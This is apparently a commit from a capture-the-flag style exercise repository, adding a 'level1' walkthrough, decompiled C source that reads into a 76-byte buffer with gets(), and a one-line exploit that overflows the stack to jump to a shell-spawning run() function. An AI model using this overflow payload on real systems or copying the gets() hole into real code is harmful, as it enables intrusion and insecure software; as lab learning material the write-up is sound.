level1 done

2025-04-28 14:55:09 +02:00 · 2025-04-28 14:55:09 +02:00 · abba9a8143
commit abba9a8143
parent 7a00213c96
3 changed files with 19 additions and 0 deletions
--- a/level1/ressources/exploit
+++ b/level1/ressources/exploit
@ -0,0 +1 @@
+(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1
--- a/level1/source.c
+++ b/level1/source.c
@ -0,0 +1,9 @@
+#include <stdio.h>
+
+int main(void)
+{
+	char buf[76];
+
+	gets(buf);
+	return 0;
+}
--- a/level1/walkthrough
+++ b/level1/walkthrough
@ -0,0 +1,9 @@
+# Level1
+
+Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets`.
+We can exploit this call to overflow the stack and call another function.
+In the binary, there is a function `run()` located at address 0x8048444 that runs `/bin/sh`.
+To exploit this, we can use this sh command with this inline python script:
+`(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1`
+This will print `run()`'s address on the stack, after the buffer being written to by `gets`, resulting in a call to the function.
+The parenthesis and the `cat` are mandatory to make it blocking and keep the shell opened.
				`@ -0,0 +1 @@`
				`(print('a'*76 + "\x44\x84\x04\x08"); cat) \| ./level1`